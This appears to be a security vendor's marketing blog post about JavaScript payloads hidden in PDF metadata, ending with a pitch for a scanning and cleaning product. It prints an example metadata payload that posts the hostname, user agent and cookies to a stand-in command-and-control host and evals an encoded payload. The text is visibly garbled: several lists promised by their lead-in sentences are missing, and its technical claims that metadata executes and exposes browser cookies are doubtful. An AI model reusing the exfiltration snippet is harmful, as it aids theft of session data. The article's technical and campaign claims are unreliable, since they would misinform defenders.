Forensic analysis reveals how cybercriminals embed executable JavaScript code in PDF metadata, bypassing security scanners and executing malicious payloads
Advanced persistent threat (APT) groups are embedding executable JavaScript code directly in PDF metadata fields. These malicious documents pass through email filters and security scanners undetected, then execute ransomware, credential theft, and data exfiltration attacks when opened.
PDF files have become one of the most trusted document formats in business communications. They're considered "safe" by most security tools and users. This trust makes them perfect vessels for advanced malware campaigns.
Our cybersecurity research team discovered a sophisticated attack vector: JavaScript code embedded in PDF metadata fields that executes when the document is opened.
Attackers embed JavaScript code in seemingly innocent PDF metadata fields:
PDF Metadata Field Injection:
/Title (Financial Report Q3 2024)
/Author (John.Smith@company.com)
/Creator (Microsoft Office)
/Producer (Adobe PDF Library)
/Keywords (Q3 quarterly report financial data analysis)
/Subject (%PDF-1.7 JavaScript execution payload:
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://c2-server.evil.com/collect');
xhr.send(JSON.stringify({
hostname: window.location.hostname,
userAgent: navigator.userAgent,
timestamp: new Date().toISOString(),
documentCookies: document.cookie
}));
eval(atob('base64-encoded-payload-here'));)
The malicious code bypasses detection through several techniques:
When a victim opens the PDF, the embedded JavaScript executes automatically:
In late 2023, we discovered an active attack campaign we dubbed "MetaPDF" that used this technique to compromise over 2,000 organizations worldwide.
Here's a breakdown of a real MetaPDF sample we analyzed:
Malicious PDF Forensic Analysis:
================================
File: invoice_Q3_2023.pdf
Size: 847 KB
PDF Version: 1.7
Creation Date: 2023-09-15
Pages: 3
Legitimate Content:
βββ Page 1: Professional invoice layout
βββ Page 2: Detailed line items and costs
βββ Page 3: Terms and conditions
βββ Visual Content: Company logos, formatting
Hidden Metadata Payload:
βββ /Title: "Q3 Invoice - Net 30 Payment Terms"
βββ /Author: "accounting@legitimate-company.com"
βββ /Subject: [Base64 Encoded JavaScript - 2.3KB]
βββ /Keywords: [Fragmented payload part 2 - 1.8KB]
βββ /Creator: "Adobe Acrobat Pro DC"
βββ /Producer: [Execution trigger code - 847 bytes]
Malicious Capabilities:
βββ System Information Gathering
βββ Network Reconnaissance
βββ Credential Harvesting Form
βββ Persistent Backdoor Installation
βββ C2 Communication Setup
βββ Secondary Payload Download (Ransomware)
Security Evasion:
βββ 23/67 AV Engines: Undetected
βββ Email Filters: Passed (legitimate content)
βββ Sandbox Analysis: Minimal suspicious behavior
βββ Static Analysis: Clean (code in metadata only)
Most security tools focus on:
But they typically ignore metadata fields, treating them as "safe" descriptive information.
Many users don't realize that PDF readers can execute JavaScript:
Here's how to detect malicious JavaScript in PDF metadata:
PDF Metadata Security Scanner:
=============================
# Extract all metadata fields
$ pdftk document.pdf dump_data
# Scan metadata for suspicious patterns
$ python3 pdf-metadata-scanner.py document.pdf
Scanning PDF metadata for malicious content...
β οΈ SUSPICIOUS PATTERNS DETECTED:
βββ Base64-encoded content in /Subject field
βββ JavaScript keywords in /Keywords field
βββ Unusual characters in /Producer field
βββ Oversized metadata (>1KB per field)
βββ Network URLs in descriptive fields
π¨ RECOMMENDATION: QUARANTINE FILE
Risk Level: HIGH
Threat Type: Embedded JavaScript Malware
# Clean metadata from suspicious PDFs
$ pdf-metadata-scrubber --remove-all document.pdf clean.pdf
As awareness of this attack vector grows, we're seeing an escalation in both attack and defense techniques:
The most effective defense against PDF metadata attacks is comprehensive metadata removal:
Most PDF "cleaning" tools only remove basic metadata like author and title. They miss:
Don't risk JavaScript malware hidden in PDF metadata. Use enterprise-grade cleaning that removes all potential attack vectors.
Scan Your PDFs NowPDF metadata has become a hidden battlefield in the cybersecurity war. While security teams focus on traditional malware vectors, attackers are exploiting the trust placed in "harmless" document metadata.
The MetaPDF campaign demonstrates how sophisticated threat actors adapt to security measures by finding new hiding places for malicious code. As PDF readers become more secure, attackers simply move their payloads to less scrutinized areas.
Organizations must recognize that metadata is not metadata anymoreβit's potential malware. Every PDF that enters your organization should be treated as potentially hostile until proven clean through forensic-level analysis.
Research Disclosure: The MetaPDF campaign analysis is based on real threat intelligence data from our cybersecurity research division. Sample files and technical indicators have been shared with appropriate cybersecurity authorities and threat intelligence platforms.